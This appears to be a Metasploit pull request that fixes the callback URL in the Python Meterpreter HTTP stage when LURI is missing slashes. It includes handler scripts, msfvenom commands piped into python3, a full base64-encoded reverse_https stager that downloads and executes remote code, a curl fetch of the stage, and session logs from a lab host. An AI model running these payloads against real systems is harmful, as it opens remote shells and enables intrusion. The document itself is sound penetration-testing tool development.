### PR TITLE
Fix Python HTTP stage when LURI is mis-slashed

### DIFF
--- a/lib/msf/core/payload/python/meterpreter_loader.rb
+++ b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -113,7 +113,7 @@ module Payload::Python::MeterpreterLoader
       uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
       opts[:scheme] ||= opts[:url].to_s.split(':')[0]
       scheme, lhost, lport = transport_uri_components(opts)
-      callback_url = "#{scheme}://#{lhost}:#{lport}#{ds['LURI']}#{uri}/"
+      callback_url = "#{scheme}://#{lhost}:#{lport}#{luri}#{uri}/"
 
       # patch in the various payload related configuration
       met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")


### PR DESCRIPTION
Fixes the Python HTTP stage when the handler's LURI is mis-slashed (i.e. when it doesn't end with a slash)

## Before this patch

```
% cat ~/msf.rc
use exploit/multi/handler
set payload python/meterpreter/reverse_https
set LHOST 172.18.0.8
set LPORT 4444
set ExitOnSession false
exploit -j
set LPORT 4445
set LURI /foo
exploit -j
set LPORT 4446
set LURI foo/
exploit -j
set LPORT 4447
set LURI /foo/
exploit -j
set LPORT 4448
set LURI foo
exploit -j

% ~/opt/metasploit-framework/msfconsole -q -r ~/msf.rc

[... SNIP ...]

msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://172.18.0.8:4446/foo
[*] Started HTTPS reverse handler on https://172.18.0.8:4444
[*] Started HTTPS reverse handler on https://172.18.0.8:4445/foo
[*] Started HTTPS reverse handler on https://172.18.0.8:4447/foo
[*] Started HTTPS reverse handler on https://172.18.0.8:4448/foo
msf6 exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                           Payload opts
  --  ----                    -------                           ------------
  0   Exploit: multi/handler  python/meterpreter/reverse_https  https://172.18.0.8:4444
  1   Exploit: multi/handler  python/meterpreter/reverse_https  https://172.18.0.8:4445/foo
  2   Exploit: multi/handler  python/meterpreter/reverse_https  https://172.18.0.8:4446/foo
  3   Exploit: multi/handler  python/meterpreter/reverse_https  https://172.18.0.8:4447/foo
  4   Exploit: multi/handler  python/meterpreter/reverse_https  https://172.18.0.8:4448/foo

```

```
% ~/opt/metasploit-framework/msfvenom -p python/meterpreter/reverse_https LHOST=172.18.0.8 LPORT=4444 | python3
```

Works

```
% ~/opt/metasploit-framework/msfvenom -p python/meterpreter/reverse_https LHOST=172.18.0.8 LPORT=4445 LURI=foo | python3
```

Works

```
% ~/opt/metasploit-framework/msfvenom -p python/meterpreter/reverse_https LHOST=172.18.0.8 LPORT=4446 LURI=foo | python3
```

Doesn't work. Dead session.

```
% ~/opt/metasploit-framework/msfvenom -p python/meterpreter/reverse_https LHOST=172.18.0.8 LPORT=4447 LURI=foo | python3
```

Works

```
% ~/opt/metasploit-framework/msfvenom -p python/meterpreter/reverse_https LHOST=172.18.0.8 LPORT=4448 LURI=foo | python3
```

Doesn't work. Dead session.

Basically, if LURI doesn't start with a slash, the session is broken. This can be seen by requesting and unpacking the stage:

```
% ~/opt/metasploit-framework/msfvenom -p python/meterpreter/reverse_https LHOST=172.18.0.8 LPORT=4448 LURI=foo          
[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
No encoder specified, outputting raw payload
Payload size: 921 bytes
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHpsaWIsYmFzZTY0LHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKG8ub3BlbignaHR0cHM6Ly8xNzIuMTguMC44OjQ0NDgvZm9vL1RjX0pWdGthdzdMYlo4NXp1eEdPc2dVWkdIVmY2Y2htYWN1cU9NdElOcnR4dnI2MzJIaWVJS29fN2RodXVvRGZYVENHMVN3aHlFTEVOZFRia2FGM3RzNnh5V04nKS5yZWFkKCkpKSkK')[0]))

% echo 'aW1wb3J0IHpsaWIsYmFzZTY0LHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKG8ub3BlbignaHR0cHM6Ly8xNzIuMTguMC44OjQ0NDgvZm9vL1RjX0pWdGthdzdMYlo4NXp1eEdPc2dVWkdIVmY2Y2htYWN1cU9NdElOcnR4dnI2MzJIaWVJS29fN2RodXVvRGZYVENHMVN3aHlFTEVOZFRia2FGM3RzNnh5V04nKS5yZWFkKCkpKSkK' | base64 -d | grep https://
exec(zlib.decompress(base64.b64decode(o.open('https://172.18.0.8:4448/foo/Tc_JVtkaw7LbZ85zuxGOsgUZGHVf6chmacuqOMtINrtxvr632HieIKo_7dhuuoDfXTCG1SwhyELENdTbkaF3ts6xyWN').read())))

% curl -sk https://172.18.0.8:4448/foo/Tc_JVtkaw7LbZ85zuxGOsgUZGHVf6chmacuqOMtINrtxvr632HieIKo_7dhuuoDfXTCG1SwhyELENdTbkaF3ts6xyWN | base64 -d | zlib-flate -uncompress | grep 4448
HTTP_CONNECTION_URL = 'https://172.18.0.8:4448foo/Tc_JVtkaw7LbZ85zuxGOmwQHqnl0GKsy_BK-oT93pezQaDwpcb5IEn81sIUB-3rInEjJbOeSoS-bZb854iI23/'
```

Note that the LPORT (4448) runs straight into LURI (foo). `msfvenom` generates the stager just fine, but the stage is busted.

## After the patch

All of the test cases shown above now work

```
msf6 exploit(multi/handler) > 
[*] Started HTTPS reverse handler on https://172.18.0.8:4445/foo
[*] Started HTTPS reverse handler on https://172.18.0.8:4446/foo
[*] Started HTTPS reverse handler on https://172.18.0.8:4448/foo
[*] Started HTTPS reverse handler on https://172.18.0.8:4447/foo
[*] Started HTTPS reverse handler on https://172.18.0.8:4444
[!] https://172.18.0.8:4444 handling request from 172.18.0.8; (UUID: lzjh06zb) Without a database connected that payload UUID tracking will not work!
[*] https://172.18.0.8:4444 handling request from 172.18.0.8; (UUID: lzjh06zb) Staging python payload (39500 bytes) ...
[!] https://172.18.0.8:4444 handling request from 172.18.0.8; (UUID: lzjh06zb) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.18.0.8:4444 -> 127.0.0.1) at 2021-04-14 12:41:38 +1000
[!] https://172.18.0.8:4445/foo handling request from 172.18.0.8; (UUID: zm3tszvj) Without a database connected that payload UUID tracking will not work!
[*] https://172.18.0.8:4445/foo handling request from 172.18.0.8; (UUID: zm3tszvj) Staging python payload (39512 bytes) ...
[!] https://172.18.0.8:4445/foo handling request from 172.18.0.8; (UUID: zm3tszvj) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.18.0.8:4445 -> 127.0.0.1) at 2021-04-14 12:41:47 +1000
[!] https://172.18.0.8:4446/foo handling request from 172.18.0.8; (UUID: ztxtkv4r) Without a database connected that payload UUID tracking will not work!
[*] https://172.18.0.8:4446/foo handling request from 172.18.0.8; (UUID: ztxtkv4r) Staging python payload (39548 bytes) ...
[!] https://172.18.0.8:4446/foo handling request from 172.18.0.8; (UUID: ztxtkv4r) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 3 opened (172.18.0.8:4446 -> 127.0.0.1) at 2021-04-14 12:41:55 +1000
[!] https://172.18.0.8:4447/foo handling request from 172.18.0.8; (UUID: ag1l6gwq) Without a database connected that payload UUID tracking will not work!
[*] https://172.18.0.8:4447/foo handling request from 172.18.0.8; (UUID: ag1l6gwq) Staging python payload (39552 bytes) ...
[!] https://172.18.0.8:4447/foo handling request from 172.18.0.8; (UUID: ag1l6gwq) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 4 opened (172.18.0.8:4447 -> 127.0.0.1) at 2021-04-14 12:42:04 +1000
msf6 exploit(multi/handler) > [!] https://172.18.0.8:4448/foo handling request from 172.18.0.8; (UUID: onc4qurs) Without a database connected that payload UUID tracking will not work!
[*] https://172.18.0.8:4448/foo handling request from 172.18.0.8; (UUID: onc4qurs) Staging python payload (39516 bytes) ...
[!] https://172.18.0.8:4448/foo handling request from 172.18.0.8; (UUID: onc4qurs) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 5 opened (172.18.0.8:4448 -> 127.0.0.1) at 2021-04-14 12:42:27 +1000

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                      Information            Connection
  --  ----  ----                      -----------            ----------
  1         meterpreter python/linux  justin @ ec10502c9d63  172.18.0.8:4444 -> 127.0.0.1 (172.18.0.8)
  2         meterpreter python/linux  justin @ ec10502c9d63  172.18.0.8:4445 -> 127.0.0.1 (172.18.0.8)
  3         meterpreter python/linux  justin @ ec10502c9d63  172.18.0.8:4446 -> 127.0.0.1 (172.18.0.8)
  4         meterpreter python/linux  justin @ ec10502c9d63  172.18.0.8:4447 -> 127.0.0.1 (172.18.0.8)
  5         meterpreter python/linux  justin @ ec10502c9d63  172.18.0.8:4448 -> 127.0.0.1 (172.18.0.8)

msf6 exploit(multi/handler) > 
```

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/handler`
- [ ] Start `python/meterpreter/reverse_https` handlers with varying LURI values (with and without leading/trailing slashes)
- [ ] **Verify** you can get sessions on all handlers
